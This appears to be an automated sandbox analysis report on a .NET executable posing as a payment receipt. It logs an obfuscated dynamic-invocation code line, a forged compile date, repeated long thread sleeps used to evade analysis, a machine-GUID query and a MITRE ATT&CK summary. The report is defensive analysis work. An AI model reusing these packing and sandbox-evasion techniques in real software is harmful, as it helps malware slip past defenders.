Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll			Jump to behavior

Source: classification engine

Classification label: mal72.evad.winEXE@1/0@1/1

Source: PAYMENT_RECEIPT_STAN100699.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PAYMENT_RECEIPT_STAN100699.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: PAYMENT_RECEIPT_STAN100699.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: NHhH77.pdb source: PAYMENT_RECEIPT_STAN100699.exe
Source:	Binary string: NHhH77.pdbX source: PAYMENT_RECEIPT_STAN100699.exe

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: PAYMENT_RECEIPT_STAN100699.exe, vIyyk4R14kq3TZsILi.cs

.Net Code: ww3HVAylFCI6ImBHiK(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{ww3HVAylFCI6ImBHiK(typeof(IntPtr).TypeHandle),ww3HVAylFCI6ImBHiK(typeof(Type).TypeHandle)})

Source: PAYMENT_RECEIPT_STAN100699.exe

Static PE information: 0xC000A530 [Fri Jan 29 04:36:00 2072 UTC]

Source: PAYMENT_RECEIPT_STAN100699.exe, vIyyk4R14kq3TZsILi.cs

High entropy of concatenated method names: 'KfGbaWtKpNcjrQkK8F0', 'BmAwC0t7OsE6fSFarGR', 'CAgabU4VwS', 'j6FHWit1y5jILIN43w7', 'yomYGwtiJrWq6IirS7S', 'kacRuYtG9xn4ndyXNbL', 'G2yo9WtYPOfvm0wZ31h', 'JrAOV0t5gtsGemwrrT3', 'bfhlO9t3VhLgkfmvXh1', 'mNijOOtsDdXTs4T2KUy'

Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Window / User API: threadDelayed 2617			Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Window / User API: threadDelayed 7224			Jump to behavior

Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 4936	Thread sleep count: 2617 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 4936	Thread sleep count: 7224 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -599778s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -597354s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -597247s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -597141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -596922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -596593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -596483s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -596375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -596266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -596141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -596016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -595797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -595674s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -595547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -595435s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -595060s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -594945s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -594844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -594015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -593904s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -593794s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 3620	Thread sleep time: -593687s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 599778	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 597354	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 597247	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 596483	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 595674	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 595435	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 595060	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 594945	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 594015	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 593904	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 593794	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 593687	Jump to behavior

Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 599778	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 597354	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 597247	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 596483	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 595674	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 595435	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 595060	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 594945	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 594015	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 593904	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 593794	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Thread delayed: delay time: 593687	Jump to behavior

Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203166372.0000000001132000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Queries volume information: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	1 Disable or Modify Tools	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
